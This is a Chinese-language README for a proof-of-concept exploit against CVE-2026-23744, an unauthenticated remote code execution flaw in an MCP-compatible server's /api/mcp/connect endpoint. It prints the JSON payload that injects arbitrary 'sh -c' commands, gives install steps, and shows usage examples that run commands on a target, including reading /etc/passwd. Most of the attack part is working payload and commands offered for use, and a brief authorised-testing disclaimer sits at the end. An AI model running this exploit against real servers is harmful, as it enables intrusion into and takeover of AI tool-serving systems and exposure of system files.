由 d3vn0mi 提供的概念验证漏洞利用
CVE-2026-23744 是暴露在 6274 端口上的 MCP 兼容服务器中存在的一个未授权远程代码执行(RCE)漏洞。/api/mcp/connect 端点接受一个 serverConfig 对象,该对象允许调用者指定任意操作系统命令及其参数——无需任何身份验证或授权检查。
能够通过网络访问该服务的攻击者可以以运行 MCP 服务器的用户身份执行任意命令。
| 详情 | 值 |
|---|
| CVE ID | CVE-2026-23744 |
| 类型 | 未授权远程代码执行 |
| 端点 | POST /api/mcp/connect |
| 端口 | 6274(默认) |
| 严重性 | 严重 |
{
"serverConfig": {
"command": "sh",
"args": ["-c", "<ATTACKER_COMMAND>"],
"env": {}
},
"serverId": "anything"
}
服务器会直接启动所提供的 command 及给定的 args,不进行任何清理或访问控制。
git clone https://github.com/d3vn0mi/CVE-2026-23744-POC.git
cd CVE-2026-23744-POC
pip install -r requirements.txt
# 基本用法
python3 exploit.py -t <TARGET_IP> -c '<COMMAND>'
# 自定义端口
python3 exploit.py -t 192.168.1.10 -p 6274 -c 'id > /tmp/pwned.txt'
# 跳过可达性检查
python3 exploit.py -t 10.0.0.5 -c 'whoami' --no-check
# 自定义服务器 ID
python3 exploit.py -t 127.0.0.1 -c 'cat /etc/passwd' -s my_server
| 标志 | 描述 |
|---|---|
-t, --target | 目标 IP 或主机名 (必填) |
-c, --command | 要执行的系统命令 (必填) |
-p, --port | 目标端口(默认:6274) |
-s, --server-id | 载荷中的 serverId 值 |
--timeout | 探测超时时间(秒)(默认:30) |
--no-check | 跳过初始可达性检查 |
/api/mcp/connect 端点的访问。本工具仅用于授权的安全测试和教育目的。未经授权访问计算机系统属于违法行为。作者对滥用行为不承担任何责任。在进行测试之前,请务必获得适当的授权。
本项目基于 MIT 许可证 授权。
d3vn0mi — github.com/d3vn0mi